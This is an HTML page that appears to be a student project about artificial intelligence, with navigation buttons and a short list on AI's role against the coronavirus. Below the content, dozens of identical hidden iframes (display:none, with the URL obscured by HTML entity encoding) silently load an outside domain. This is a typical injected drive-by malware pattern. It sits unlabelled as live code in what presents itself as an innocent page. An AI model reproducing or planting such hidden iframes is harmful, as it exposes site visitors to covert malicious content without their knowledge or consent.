<html>
<head>
   <title> computer project </title>
   
   
   <style>
   body{
   background:url(209910-P06STF-200.jpg) repeat fixed}
   
   #ss{ 
   color:#99d8d0;}
   #bb{
   color:#f4f6ff;
   }
   #bs{
   color:#f4f6ff;
   font-size:20px;
   }
   
   
   h1 { font-family: 'Avant Garde', Avantgarde, 'Century Gothic', CenturyGothic, AppleGothic, sans-serif; font-size: 35px; font-style: normal; font-variant: normal; font-weight: bold; line-height: 26.3999996185303px; } 
   
   
  .myButton {
	background-color:#2dabf9;
	border-radius:28px;
	border:1px solid #0b0e07;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:12px;
	padding:16px 31px;
	text-decoration:none;
	text-shadow:0px 1px 0px #263666;
}
.myButton:hover {
	background-color:#0688fa;
}
.myButton:active {
	position:relative;
	top:1px;}
	
a { color: #393e46; }
a:link{text-decoration:none; }
a:visited{text-decoration:none;}
a:hover{text-decoration:none;}
        
   
   </style>
</head>

<body>
<h1 align="center" id="ss" > ARTIFICIAL INTELLIGENCE </h1>
<br />
<h2 id="bb">links:</h2>

<ul>

<li> <button class="myButton" id="gg"><a href="difination.html">difination</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="pros and cons.html">pros and cons</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="uses.html">uses of AI</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="role.html"> AI facing corona virus</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="new.html"> main page</a> </button>  </li>


</ul> 

 <div id="bs"> <ol>
       <li>Track the spread of the Corona virus through machine learning</li>
        <li>Using artificial intelligence to diagnose people with coronavirus</li>
       <li>Dependence on robots for sterilization and patient treatment</li>
       <br />
        <li>Artificial intelligence helps speed up the creation of a vaccine</li>
 </div>
</ol>

<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
</body>
</html>